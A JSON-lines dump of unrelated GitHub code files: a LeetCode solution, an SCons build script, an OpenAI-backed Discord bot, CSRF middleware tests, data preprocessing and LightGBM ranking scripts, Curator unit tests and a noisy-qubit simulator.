{"seq_id":"10186230513","text":"import functools\nfrom typing import List\n\n\nclass Solution:\n    def minNumber(self, nums: List[int]) -> str:\n        def compare(x, y):\n            # cmp_to_key expects a negative value when x should sort before y\n            if x + y < y + x: return -1\n            elif x + y > y + x: return 1\n            else: return 0\n        nums = [str(num) for num in nums]\n        nums = sorted(nums, key=functools.cmp_to_key(compare))\n        return ''.join(nums)\n\ntest = Solution()\nnums = [123,321]\nprint(test.minNumber(nums))","repo_name":"DeclK/2023-Autumn-Recruitment-Summary","sub_path":"leetcode-diary/Offer 45. 把数组排成最小的数.py","file_name":"Offer 45. 
把数组排成最小的数.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"84"} +{"seq_id":"70065922836","text":"import platform\n\nfrom SCons.Errors import BuildError\n\nImport('env')\nif not 'pkg' in COMMAND_LINE_TARGETS:\n Return()\ndef unsupported(system):\n raise BuildError(errstr=\"Cannot build %s installer; platform package builder not yet implemented.\" % system)\n\nsupported = {\n 'deb':lambda :env.SConscript('deb/SConscript', 'env'), \n 'osx':lambda :env.SConscript('osx/SConscript', 'env'), \n 'msi':lambda :env.SConscript('win32/SConscript', 'env')\n}\n\nsystem = platform.system()\nif system == 'Linux':\n distro = platform.linux_distribution()[0]\n if distro.lower() in ('debian', 'ubuntu'):\n supported['deb']()\n else:\n unsupported(distro)\nelif system == 'Windows':\n unsupported(system) \nelif system == 'Darwin':\n unsupported(system)\nelse:\n unsupported(system)\n","repo_name":"ldrumm/libbeemo","sub_path":"pkg/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"35139601325","text":"#Author: BinaryBills\r\n#Creation Date: January 8, 2022\r\n#Date Modified: January 17, 2022\r\n#Purpose: This file handle using the OpenAI API to respond to users. It also handles\r\n#saving the memory of the AI to the SQL database, so it can engage in conversations\r\n#with users. \r\n\r\nimport openai\r\nimport random\r\nfrom discord import app_commands\r\nfrom discord.ext import commands\r\nfrom config import settings\r\nfrom config import sqlServer\r\nimport collections\r\n\r\nclass aiBot(commands.Cog):\r\n def __init__(self,client):\r\n self.client = client\r\n self.queue = collections.deque(maxlen=50000)\r\n \r\n @commands.Cog.listener()\r\n async def on_message(self,message):\r\n try:\r\n if message.author == self.client.user:\r\n return\r\n\r\n # Check if there is a previous conversation with this user\r\n sql = \"SELECT message FROM conversations WHERE user_id = %s ORDER BY created_at DESC LIMIT 1\"\r\n previous_convo = await sqlServer.mysqli_user_query(settings.conn, sql, (message.author.id,))\r\n prompt = message.content if not previous_convo else previous_convo[0][0]\r\n\r\n #Add current message to the database\r\n sql = \"INSERT INTO conversations (message) VALUES (%s)\"\r\n conversation_id = await sqlServer.mysqli_user_query(settings.conn, sql, (message.content,))\r\n\r\n #Add message so it can remember previous message\r\n self.queue.append(message.content)\r\n\r\n prompt = f\"Hey give me a response for this: {message.content}.\\n\"\r\n for i, msg in enumerate(self.queue):\r\n prompt += f\"Message {i}: {msg}\\n\"\r\n\r\n\r\n #Get the bot's response and add it to the database\r\n response = openai.Completion.create(\r\n model=\"text-davinci-003\",\r\n prompt=prompt,\r\n temperature=0.4,\r\n max_tokens=150,\r\n top_p=1.0,\r\n frequency_penalty=0.5,\r\n presence_penalty=0.0,\r\n stop=[\"You:\"]\r\n )\r\n\r\n #Send the response to the server\r\n bot_response = response.choices[0].text.strip()\r\n sql = \"UPDATE conversations SET response = %s WHERE id = %s\"\r\n await sqlServer.mysqli_user_query(settings.conn, sql, (bot_response, conversation_id))\r\n print(bot_response)\r\n\r\n #If the bot's response is empty, generate a new response or send a default message\r\n if not bot_response:\r\n # Option 1: Generate a new response with a different prompt\r\n new_prompt = f\"Can you tell me 
more about {random.choice(['your hobbies', 'your job', 'your family'])}?\\n\"\r\n response = openai.Completion.create(\r\n model=\"text-davinci-003\",\r\n prompt=new_prompt,\r\n temperature=0.4,\r\n max_tokens=150,\r\n top_p=1.0,\r\n frequency_penalty=0.5,\r\n presence_penalty=0.0,\r\n stop=[\"You:\"]\r\n )\r\n bot_response = response.choices[0].text.strip()\r\n\r\n # Send the bot's response to the channel\r\n if bot_response != \" \":\r\n await message.channel.send(bot_response)\r\n \r\n \r\n except Exception as e:\r\n print(f\"The error '{e}' occurred\")\r\n \r\n \r\nasync def setup(client):\r\n await client.add_cog(aiBot(client))","repo_name":"BinaryBills/AIChatBot","sub_path":"cogs/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":3490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"7106282803","text":"from endpoints import home_endpoint\nfrom request import Request\nfrom middleware import logging_middleware_factory, headers_middleware_factory, csrf_middlware_factory\n# A HELPER TEST FUNCTION\n\ndef run_test(condition, name):\n if condition:\n print(f\"{name} - Pass\")\n else:\n print(f\"{name} - Fail\")\n\n# COMPOSING THE MIDDLEWARE CHAIN\n\nmiddleware_chain = csrf_middlware_factory(home_endpoint)\nmiddleware_chain = headers_middleware_factory(middleware_chain)\nmiddleware_chain = logging_middleware_factory(middleware_chain)\nprint(middleware_chain)\n\n# TESTS\n\nreq1 = Request(\n method=\"GET\",\n uri=\"/\",\n version=\"HTTP/1.1\",\n text=\"\",\n headers={\n \"Accept\": \"text/html\",\n \"X-CSRF-TOKEN\": \"qasdfoin234908asdfn\"\n }\n)\nprint(\"==== OUTPUT FROM MIDDLEWARE CHAIN APPEARS HERE ====\")\nresponse = middleware_chain(req1)\nprint(\"==================================================\")\n\n## TESTS FOR ENDPOINT FUNCTIONALITY\nrun_test(\n response.code == 200,\n \"Home endpoint base functionality status should be 200\"\n)\n\nrun_test(\n response.reason == \"Ok\",\n \"Home endpoint base functionality reason should be Ok\"\n)\n\nrun_test(\n response.headers[\"Content-Type\"] == \"text/html\",\n \"Home endpoint base functionality content type header should be text/html\"\n)\n\n## TESTS FOR HEADERS_MIDDLEWARE\nprint()\nrun_test(\n \"Content-Length\" in response.headers and response.headers[\"Content-Length\"] == 22,\n \"Home endpoint headers_middleware content length header should be 22\"\n)\n\nrun_test(\n \"Server\" in response.headers and response.headers[\"Server\"] == \"My Mock Server\",\n \"Home endpoint headers_middleware server header should be set\"\n)\n\nrun_test(\n \"Connection\" in response.headers and response.headers[\"Connection\"] == \"close\",\n \"Home endpoint headers_middleware connection header should be close\"\n)\n\n## TESTS FOR THE CSRF MIDDLEWARE\nprint()\nreq2 = Request(\n method=\"GET\",\n uri=\"/\",\n version=\"HTTP/1.1\",\n text=\"\",\n headers={\n \"Accept\": \"text/html\",\n ## notice that X-CSRF-Token is missing\n }\n)\n\nprint(\"==== OUTPUT FROM MIDDLEWARE CHAIN APPEARS HERE ====\")\nresponse = middleware_chain(req2)\nprint(\"==================================================\")\n\nrun_test(\n response.code == 401,\n \"Home endpoint csrf_middleware missing token should have status 401\"\n)\n\nrun_test(\n response.text == \"
<h1>Unauthorized</h1>
\",\n \"Home endpoint csrf_middleware text should display unauthorized\"\n)\n\nrun_test(\n \"Content-Length\" in response.headers and response.headers[\"Content-Length\"] == 21,\n \"Home endpoint csrf_middleware content length header should be 21\"\n)\n\nrun_test(\n \"Server\" in response.headers and response.headers[\"Server\"] == \"My Mock Server\",\n \"Home endpoint csrf_middleware server header should be set\"\n)\n\nrun_test(\n \"Connection\" in response.headers and response.headers[\"Connection\"] == \"close\",\n \"Home endpoint csrf_middleware connection header should be close\"\n)","repo_name":"dittonjs/CS2610Fa23ClassExamples","sub_path":"middleware/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"41204655484","text":"import csv\nimport datetime\nfrom datetime import datetime as dt\n\nfrom rs_csv_processor.resources.constants import SrsDefaultValues\n\n\nclass SrsUtils:\n def __init__(self, input_dat_path: str):\n self.input_dat_path = input_dat_path\n self.raw_data = SrsUtils.read_dat_as_csv(input_dat_path)\n\n @staticmethod\n def read_dat_as_csv(input_dat_path: str) -> list[list]:\n with open(input_dat_path, 'r') as i_d:\n d_reader = csv.reader(i_d, delimiter=',', quotechar='|')\n rows = [row for row in d_reader if len(row) != 0]\n headers = [header.replace('\"', '') for header in rows[1]]\n csv_data = [headers]\n csv_data.extend(rows[4:])\n return csv_data\n\n def get_relevant_indices_and_target_headers(self) -> tuple[list, list, list]:\n headers = self.raw_data[1]\n\n ndvi_data_headers = [header for header in headers if header.startswith('NDVI')]\n ndvi_data_fields_indices = [headers.index(field) for field in ndvi_data_headers]\n\n administrative_fields_indices = [i for i in range(4)]\n administrative_fields = headers[:4]\n\n target_headers = administrative_fields + ndvi_data_headers\n\n return ndvi_data_fields_indices, administrative_fields_indices, target_headers\n\n def extract_from_fixed_hour_of_the_day(\n self,\n dat_date_format: str = SrsDefaultValues.dat_date_format,\n fixed_date_format: str = SrsDefaultValues.fixed_date_format,\n collection_hour: int = SrsDefaultValues.collection_hour,\n collection_minutes: int = SrsDefaultValues.collection_minutes\n ) -> list[list]:\n\n ndvi_data_fields_indices, administrative_fields_indices, target_headers = \\\n self.get_relevant_indices_and_target_headers()\n\n relevant_csv_data = [target_headers]\n\n for line in self.raw_data[4:]:\n temp_record = []\n date = dt.strptime(line[0].replace('\"', ''), dat_date_format)\n formatted_date = dt.strftime(date, fixed_date_format)\n line[0] = formatted_date\n if date.hour == collection_hour and date.minute == collection_minutes:\n for cell in line:\n if line.index(cell) in administrative_fields_indices or line.index(cell) in ndvi_data_fields_indices:\n temp_record.append(cell.replace('\"', ''))\n relevant_csv_data.append(temp_record)\n\n return relevant_csv_data\n\n def extract_daily_dataset(\n self,\n collection_date: datetime,\n dat_date_format: str = SrsDefaultValues.dat_date_format,\n fixed_datetime__format: str = SrsDefaultValues.fixed_date_time_format,\n ):\n relevant_csv_data = []\n ndvi_data_fields_indices, administrative_fields_indices, target_headers = \\\n self.get_relevant_indices_and_target_headers()\n relevant_csv_data.append(target_headers)\n for i, line in enumerate(self.raw_data[4:]):\n date = dt.strptime(line[0].replace('\"', ''), 
dat_date_format)\n if date.date() == collection_date.date():\n formatted_date = dt.strftime(date, fixed_datetime__format)\n line[0] = formatted_date\n relevant_csv_data.append(line)\n\n return relevant_csv_data\n","repo_name":"omriderhi/RS-csv-processor","sub_path":"rs_csv_processor/utils/srs_utils.py","file_name":"srs_utils.py","file_ext":"py","file_size_in_byte":3319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"33024658764","text":"import mysql.connector\nimport sys\n\"\"\" \n Ensures any raw data in prod_data_insert does not violate the schema of database.\n Sometimes, there may be constraints in our schema not reflected in the prod database.\n By reprocessing the raw data, we validate the data.\n\n Assumes the local database is empty. You should run this before loading the records into\n the database\n\n Output: A cleaned file - sanitized_prod_data_insert.sql\n\"\"\"\nsys.stdout.reconfigure(encoding='utf-8')\n\ncnx = mysql.connector.connect(\n host='localhost',\n\tuser='root',\n\tpassword='password',\n\tdatabase='myschedule',\n\tport=3306\n)\ncursor = cnx.cursor()\n\n# Open the input file and read the lines\nINPUT_FILE = \"prod_data_insert.sql\" # Change this if you want to sanitize something else\nwith open(INPUT_FILE) as f:\n lines = f.read().splitlines()\n\n\nprint('USE MySchedule;')\nfailCount = 0\nerrorReasons = set()\nfor query in lines:\n # Attempt to execute the SQL query\n # Print only if it succeeds\n try:\n cursor.execute(query)\n print(query)\n except mysql.connector.Error as err:\n # Print to stderr so output redirection works properly\n err = str(err)\n print(\"stderr: failed: {}\".format(query), file=sys.stderr)\n print(\"stderr: reason: {}\\n\".format(err), file=sys.stderr)\n errorReasons.add(err[err.index(':'):])\n failCount += 1\n\nprint(\"stderr: total invalid SQL queries: {}\".format(failCount), file=sys.stderr)\nprint(\"stderr: Summary of {} general error reason(s):\".format(len(errorReasons)), file=sys.stderr)\nprint('\\n'.join(errorReasons), file=sys.stderr)\n\n# Don't actually commit anything\ncnx.rollback()\ncursor.close()\ncnx.close()","repo_name":"1nvisibilia/CS348-Project","sub_path":"sanitize.py","file_name":"sanitize.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"2521183189","text":"import pandas as pd \nimport numpy as np\nimport os \nfrom scipy.sparse import csr_matrix, hstack\n\nfrom sklearn import preprocessing\n\nmy_dir = os.environ['Trivago']\nos.chdir(my_dir)\n\nfrom Frequency_model import Frequency_model\n\nif os.environ['Trivago_debug']=='True':\n train_data = pd.read_csv(\"data/DEBUG_train.csv\")\n test_data = pd.read_csv(\"data/DEBUG_test.csv\")\n meta_data = pd.read_csv(\"data/DEBUG_metadata_updated.csv\")\nelse:\n train_data = pd.read_csv(\"data/train.csv\")\n test_data = pd.read_csv(\"data/test.csv\")\n meta_data = pd.read_csv(\"data/metadata_updated.csv\")\n\ntry:\n num_threads=int(os.environ['num_threads'])\nexcept:\n num_threads=4\n# Let's agree on this being our data \ntrain_instances = [x[1].reset_index(drop=True) for x in train_data.groupby(\"user_id\")]\ntest_instances = [x[1].reset_index(drop=True) for x in test_data.groupby(\"user_id\")]\n\n\n# This has to be tuned further\nparams = {\n'task': 'train',\n'boosting_type': 'gbdt',\n'objective': 'lambdarank',\n'lambda_l2' : 0.0037996,\n'lambda_l1' : 190.0417685,\n'metric': {'ndcg'},\n'max_position': 4, ##how many 
ranks the lgbm cares about\n#'metric': {'l2', 'auc', 'binary'},\n'num_leaves': 92,\n'bagging_fraction': 0.82191889,\n'bagging_freq':10,\n'max_depth': 30,\n'max_bin':63,\n'feature_fraction':0.6,\n'min_data_in_leaf':73,\n'learning_rate': 0.01,\n'verbose': 10,\n'output_model' : 'model/logs/model.txt', #Lets us load the model after\n'metric_freq':5,\n'num_threads': num_threads\n}\n\nbase_name='Final'\nif os.environ['Trivago_debug']=='True':\n num_round = 15\n base_name=base_name+'_DEBUG'\nelse:\n num_round = 17000\n\nMy_Model = Frequency_model(meta_data,params,num_round, num_threads=num_threads)\n\nTune=True\ndata_premade=False\n\nif Tune:\n My_Model.fit(train_instances,test_instances=test_instances, Tune = Tune, data_premade=data_premade, K=5)\n\n num_round_new = My_Model.optimal_rounds\n\n print(\"Retraining on full Dataset num_round=%s --------------------------\"%num_round_new)\n\n My_Model.change_num_round(num_round_new)\n\n data_premade = True\n My_Model.record_valid_preds(base_name)\nMy_Model.fit(train_instances,Tune=False, test_instances=test_instances, data_premade=data_premade) \n\nMy_Model.predict(test_instances,out=False)\nprint(My_Model.timer)\nMy_Model.predictions_to_csv(\"%s.csv\"%base_name)\nMy_Model.record_test_preds(base_name)\nMy_Model.log_model(base_name, newname=False)\n","repo_name":"Fisch-Alex/Recsys2019","sub_path":"model/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"} +{"seq_id":"27713988220","text":"\"\"\"test_action_clusterrouting\"\"\"\nfrom unittest import TestCase\nfrom mock import Mock\nfrom curator.actions import ClusterRouting\n# Get test variables and constants from a single source\nfrom . import testvars\n\nclass TestActionAllocation(TestCase):\n def test_bad_client(self):\n self.assertRaises(TypeError, ClusterRouting, 'invalid', setting='enable')\n def test_bad_setting(self):\n client = Mock()\n self.assertRaises(\n ValueError, ClusterRouting, client, setting='invalid'\n )\n def test_bad_routing_type(self):\n client = Mock()\n self.assertRaises(\n ValueError,\n ClusterRouting,\n client,\n routing_type='invalid',\n setting='enable'\n )\n def test_bad_value_with_allocation(self):\n client = Mock()\n self.assertRaises(\n ValueError,\n ClusterRouting,\n client,\n routing_type='allocation',\n setting='enable',\n value='invalid'\n )\n def test_bad_value_with_rebalance(self):\n client = Mock()\n self.assertRaises(\n ValueError,\n ClusterRouting,\n client,\n routing_type='rebalance',\n setting='enable',\n value='invalid'\n )\n def test_do_dry_run(self):\n client = Mock()\n cro = ClusterRouting(\n client,\n routing_type='allocation',\n setting='enable',\n value='all'\n )\n self.assertIsNone(cro.do_dry_run())\n def test_do_action_raise_on_put_settings(self):\n client = Mock()\n client.cluster.put_settings.return_value = None\n client.cluster.put_settings.side_effect = testvars.fake_fail\n cro = ClusterRouting(\n client,\n routing_type='allocation',\n setting='enable',\n value='all'\n )\n self.assertRaises(Exception, cro.do_action)\n def test_do_action_wait(self):\n client = Mock()\n client.cluster.put_settings.return_value = None\n client.cluster.health.return_value = {'relocating_shards':0}\n cro = ClusterRouting(\n client,\n routing_type='allocation',\n setting='enable',\n value='all',\n wait_for_completion=True\n )\n 
self.assertIsNone(cro.do_action())\n","repo_name":"elastic/curator","sub_path":"tests/unit/test_action_clusterrouting.py","file_name":"test_action_clusterrouting.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":3017,"dataset":"github-code","pt":"84"} +{"seq_id":"12165290416","text":"\"\"\"\nThis module implements a simulator for a noisy qubit\n\"\"\"\n\n# preample\nimport numpy as np\nfrom functools import reduce\nfrom itertools import product\n###############################################################################\nclass NoisyQubitSimulator(object):\n \"\"\"\n Class for simulating a noisy spin qubit \n \"\"\"\n\n def __init__(self, T, M, tau, sigma, Omega, K, Type=\"Gaussian\", P_desired=[None,None,None]):\n \"\"\"\n Class constructor\n \n T : The total evolution time\n M : The number of discrete time steps \n tau : A list of the lists of centres of the pulses along each direction, put [-1] for no pulse (t is in [0,T])\n sigma : The standard deviation of the gaussian pulses along each direction/ or the pulse width in case of square pulses\n Omega : The energy gap of the qubit \n K : The number of realizations for the monte carlo simulation\n Type : Pulse shape which is either \"Square\" or \"Gaussian\"(default)\n P_desired : A list of PSD of noise along each direction, put None for a noiseless direction (default is noiseless)\n \"\"\"\n \n # store the simulation parameters\n self.T = T\n self.M = M\n self.tau = tau\n self.sigma = sigma\n self.Omega = Omega\n self.K = K\n self.Type = Type\n self.P_desired = P_desired\n \n # initialize the pulse time-domain waveform arrays \n self.h_x = np.zeros((1,self.M)) \n self.h_y = np.zeros((1,self.M))\n self.h_z = np.zeros((1,self.M))\n \n # construct the time vector\n self.delta_t = T/M # time step\n self.time_range = [(0.5*self.delta_t) + (j*self.delta_t) for j in range(M)] # list of time steps\n\n\n # construct the matrix representing the Gaussian bases for each directions \n if self.Type==\"Gaussian\":\n self.theta_x = np.array( [[np.exp(-0.5*((t-tau)/self.sigma)**2) for tau in self.tau[0]] for t in self.time_range] )\n self.theta_y = np.array( [[np.exp(-0.5*((t-tau)/self.sigma)**2) for tau in self.tau[1]] for t in self.time_range] )\n self.theta_z = np.array( [[np.exp(-0.5*((t-tau)/self.sigma)**2) for tau in self.tau[2]] for t in self.time_range] )\n \n \n # define the Pauli matrices\n self.sigma_x = np.array([[0.,1.],[1.,0.]])\n self.sigma_y = np.array([[0.,-1j],[1j,0.]])\n self.sigma_z = np.array([[1.,0.],[0.,-1.]])\n \n \n def set_pulses(self, alpha):\n \"\"\"\n This method to construct the evolution matrix for all noise realizations given the pulses amplitudes\n \n alpha: A list of the lists of amplitudes of the pulses along each direction\n \"\"\"\n \n # unpack the amplitude vector for each direction\n self.alpha_x,self.alpha_y,self.alpha_z = alpha\n \n # construct the waveforms\n if self.Type == \"Gaussian\": \n self.h_x = (self.theta_x @ self.alpha_x)\n self.h_y = (self.theta_y @ self.alpha_y)\n self.h_z = (self.theta_z @ self.alpha_z) \n else:\n pwidth = self.sigma\n self.h_x = sum( [np.array([(t>(tau-0.5*pwidth))*(t<(tau+0.5*pwidth))*A for t in self.time_range]) for tau, A in zip(self.tau[0],self.alpha_x)] )\n self.h_y = sum( [np.array([(t>(tau-0.5*pwidth))*(t<(tau+0.5*pwidth))*A for t in self.time_range]) for tau, A in zip(self.tau[1],self.alpha_y)] )\n self.h_z = sum( [np.array([(t>(tau-0.5*pwidth))*(t<(tau+0.5*pwidth))*A for t in self.time_range]) for tau, A in 
zip(self.tau[2],self.alpha_z)] )\n \n # generate the noise realizations\n self.generate_arbitrary_noise(self.P_desired)\n \n # construct a list of the Hamiltonians for each noise realization\n self.set_hamiltonians()\n \n # construct the unitary matrix for each realization\n self.evolve()\n \n \n def generate_arbitrary_noise(self,P_desired):\n \"\"\"\n generate random noise according to some desired power spectral density according to the algorithm here:\n https://stackoverflow.com/questions/25787040/synthesize-psd-in-matlab\n \n P_desired: a list of arrays representing desired PSD [single side band representation] along x,y,z\n \"\"\"\n \n Ts = self.delta_t # sampling time (1/sampling frequency)\n N = self.M # number of required samples\n \n if not P_desired[0] is None:\n # define a list to store the different noise realizations\n self.beta_x = []\n \n # generate different realizations\n for _ in range(self.K):\n #1) add random phase to the properly normalized PSD\n P_temp = np.sqrt(P_desired[0]*N/Ts)*np.exp(2*np.pi*1j*np.random.rand(1,N//2))\n \n #2) add the symmetric part of the spectrum\n P_temp = np.concatenate( ( P_temp , np.flip(P_temp.conj()) ), axis=1 )\n \n #3) take the inverse Fourier transform\n x = np.real(np.fft.ifft(P_temp))\n \n # store\n self.beta_x.append(np.reshape(x,self.h_x.shape))\n else:\n # no noise in this direction\n self.beta_x = [np.zeros(self.h_x.shape) for k in range(self.K)]\n \n if not P_desired[1] is None: \n # define a list to store the different noise realizations\n self.beta_y = [] \n # generate different realizations\n for _ in range(self.K):\n #1) add random phase to the properly normalized PSD\n P_temp = np.sqrt(P_desired[1]*N/Ts)*np.exp(2*np.pi*1j*np.random.rand(1,N//2))\n \n #2) add the symmetric part of the spectrum\n P_temp = np.concatenate( ( P_temp , np.flip(P_temp.conj()) ), axis=1 )\n \n #3) take the inverse Fourier transform\n x = np.real(np.fft.ifft(P_temp))\n \n # store\n self.beta_y.append(np.reshape(x,self.h_y.shape))\n else:\n # no noise in this direction\n self.beta_y = [np.zeros(self.h_y.shape) for k in range(self.K)]\n \n if not P_desired[2] is None:\n # define a list to store the different noise realizations\n self.beta_z = [] \n # generate different realizations\n for _ in range(self.K):\n #1) add random phase to the properly normalized PSD\n P_temp = np.sqrt(P_desired[2]*N/Ts)*np.exp(2*np.pi*1j*np.random.rand(1,N//2))\n \n #2) add the symmetric part of the spectrum\n P_temp = np.concatenate( ( P_temp , np.flip(P_temp.conj()) ), axis=1 )\n \n #3) take the inverse Fourier transform\n x = np.real(np.fft.ifft(P_temp))\n \n # store\n self.beta_z.append(np.reshape(x,self.h_z.shape)) \n else:\n # no noise in this direction\n self.beta_z = [np.zeros(self.h_z.shape) for k in range(self.K)] \n \n def set_hamiltonians(self):\n \"\"\"\n This method is to construct a list of Hamiltonians to calculate the propagators\n \"\"\"\n \n # construct and store the Hamitlonian at each time step for all noise realizations\n self.Hamiltonians = [ [0.5 * self.sigma_z * (self.Omega + b_z + h_z) + 0.5 * self.sigma_x * (h_x + b_x) + 0.5 * self.sigma_y * (h_y + b_y) for b_x, b_y, b_z, h_x, h_y,h_z in zip(beta_x, beta_y, beta_z, self.h_x,self.h_y,self.h_z)] for beta_x,beta_y,beta_z in zip(self.beta_x,self.beta_y,self.beta_z)]\n\n \n def evolve(self):\n \"\"\"\n This method is to calculate the final unitary\n \"\"\"\n \n # define a lambda function for calculating the propagators\n evolve = lambda U,U_j: U_j @ U\n \n # calculate and accumalate all propagators till 
the final one, and repeat over all realizations\n        self.U = [reduce(evolve, [self.expm2(self.delta_t*H) for H in Hamiltonian]) for Hamiltonian in self.Hamiltonians]\n        \n    def measure(self, initial_state, measurement_operator):\n        \"\"\"\n        This method is to perform measurements on the final state.\n        \n        initial_state       : The density matrix of the initial state\n        measurement_operator: Measurement Operator\n        \"\"\"\n        # initialize an empty list to store the expectation for each realization\n        expectation = []\n        \n        # loop over all realizations\n        for U in self.U:\n            # calculate the final state\n            final_state = U @ initial_state @ U.conj().T\n            \n            # calculate the probability of the outcome\n            expectation.append( np.real( np.trace(final_state @ measurement_operator) ) )\n\n        return np.average(expectation)\n\n    def measure_all(self):\n        \"\"\"\n        This method simulates the full tomographic set of measurements with all initial states and all measurement operators\n        \"\"\"\n        \n        # define a list of initial states corresponding to the up/down eigenstates of each of the Pauli measurement operators\n        initial_states = [np.array([[0.5,0.5],[0.5,0.5]]), np.array([[0.5,-0.5],[-0.5,0.5]]),\n                          np.array([[0.5,-0.5j],[0.5j,0.5]]),np.array([[0.5,0.5j],[-0.5j,0.5]]),\n                          np.array([[1,0],[0,0]]), np.array([[0,0],[0,1]]) ]\n        \n        # define the list of measurement operators\n        measurement_operators = [self.sigma_x, self.sigma_y, self.sigma_z]\n        \n        # calculate each measurement \n        expectations = [self.measure(rho,X) for rho,X in product(initial_states, measurement_operators) ]\n        \n        return np.array(expectations)\n    \n    def measure_one_shot(self, initial_state, measurement_projector):\n        \"\"\"\n        This method simulates one-shot measurements and returns a list of +1/-1 corresponding to each measurement\n        \"\"\"\n        \n        # simulate the coin flip with outcomes +1/-1, repeated for each noise realization\n        return [2*int( np.random.rand() > np.real(np.trace( U @ initial_state @ U.conj().T @ measurement_projector ) ) )-1 for U in self.U]\n    \n    def expm2(self, H):\n        \"\"\"\n        This is an internal method to calculate the matrix exponential more efficiently using Euler's formula. 
Works only for qubits.\n \"\"\"\n \n # parameterize the Hamiltonian in terms of the three Pauli basis\n a_vector = [np.real(H[0,1]), np.imag(H[0,1]), H[0,0]]\n \n # calculate the norm of the Pauli vector\n a = np.sqrt(a_vector[0]**2 + a_vector[1]**2 + a_vector[2]**2 )\n \n if a==0:\n return np.array([[1.,0.],[0.,1.]]) # Identity\n else:\n # use Euler's formula to calculate e^(-i a \\hat{n} \\cdot \\sigma) = I cos a - i (\\hat{n}\\cdot\\sigma) sin a\n return np.cos(a)*np.array([[1.,0.],[0.,1.]]) - 1j*H*np.sin(a)/a","repo_name":"akramyoussry/BQNS","sub_path":"src/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":11298,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"84"} +{"seq_id":"17939649955","text":"from html.parser import HTMLParser\nfrom collections import defaultdict\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.feature_extraction.text import TfidfTransformer\nimport pandas as pd\nimport sys\nsys.path.append('../')\nimport warnings\nimport os\nimport numpy as np\nimport config.setup as setup\nfrom config.config import Config\nwarnings.filterwarnings('ignore')\n\n\nclass MyHTMLParser(HTMLParser):\n def __init__(self):\n self.count = defaultdict(int)\n super().__init__()\n\n def handle_starttag(self, tag, attrs):\n self.count[tag] += 1\n\n def handle_startendtag(self, tag, attrs):\n self.count[tag] += 1\n\ndef count_tags(html):\n parser = MyHTMLParser()\n parser.feed(html)\n return parser.count\n\n# 構成のセットアップ\ncfg = setup.setup(Config)\n\n# データの読込\ntrain_raw = pd.read_csv(os.path.join(cfg.INPUT, \"raw/train.csv\"))\ntest_raw = pd.read_csv(os.path.join(cfg.INPUT, \"raw/test.csv\"))\ntrain_raw['train_flag'] = True\ntest_raw['train_flag'] = False\ndf = pd.concat([train_raw, test_raw])\n\ndf_goal = df['goal'].replace('100000+', '100000-100000').str.split('-', expand=True)\ndf_goal.rename(columns={0: 'goal_inf', 1: 'goal_sup'}, inplace=True)\ndf['mid_goal'] = ((df_goal['goal_inf'].astype(int) + df_goal['goal_sup'].astype(int))/2).astype(int)\ndf['len_html'] = df['html_content'].str.len()\ndf['word_count'] = df['html_content'].str.split().str.len()\ndf['inner_link'] = df['html_content'].str.count('href=')\ndf['num_lines'] = df['html_content'].str.count('\\n') + 1\ndf_goal = df['html_content'].replace('\\n', '')\n\ndf['html_content'] = df['html_content'].astype(str)\ncat1 = df['category1'].tolist()\ncat2 = df['category2'].tolist()\nreplaced_texts = [text.replace('\\n', '')\n for text in df['html_content'].tolist()]\nconverted_texts = []\nfor cat1_, cat2_, text in zip(cat1, cat2, replaced_texts):\n found = text.replace('
<div>', '')[:-6]\n    converted_texts.append(cat1_ + ' ' + cat2_ + ' ' + found)\ndf['html_content'] = converted_texts\n\n# compute TF-IDF values from the tag frequencies\nwhole_tag_df = pd.DataFrame(map(count_tags, df['html_content'])).fillna(0)\ntf_trans = TfidfTransformer()\ntag_columns = whole_tag_df.columns\nwhole_tag_df = pd.DataFrame(tf_trans.fit_transform(whole_tag_df).todense(), columns=tag_columns)\ndf[tag_columns] = whole_tag_df\ndf['num_tag'] = whole_tag_df.sum(axis=1)\n\n# split the goal column\ndf[['goal1', 'goal2']] = df['goal'].str.split('-', expand=True)\ndf['goal1'] = df['goal1'].str.rstrip('+').fillna(-100).astype(int)\ndf['goal2'] = df['goal2'].str.rstrip('+').fillna(-100).astype(int)\ndf['goal_diff'] = df['goal2'] - df['goal1']\n\n# labelEncoding\ncategory_list = ['country', 'category1', 'category2']\nfor cat in category_list:\n    le = LabelEncoder()\n    le.fit(df[cat])\n    label_encoded_column = le.fit_transform(df[cat])\n    df[cat] = pd.Series(label_encoded_column).astype('category')\n\ndf_train = df[df['train_flag']==True]\ndf_train = df_train.drop(['train_flag'], axis=1)\ndf_train[cfg.target] = df_train[cfg.target].astype('int')\ndf_test = df[df['train_flag']==False]\ndf_test = df_test.drop(['train_flag'], axis=1)\n\nprint(df.columns.tolist())\ndf_train.to_csv(os.path.join(cfg.INPUT, \"processed/processed_train.csv\"), index=False)\ndf_test.to_csv(os.path.join(cfg.INPUT, \"processed/processed_test.csv\"), index=False)\n","repo_name":"sumugit/mufg_champion_ship","sub_path":"source/scripts/preprocess/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":3330,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"}
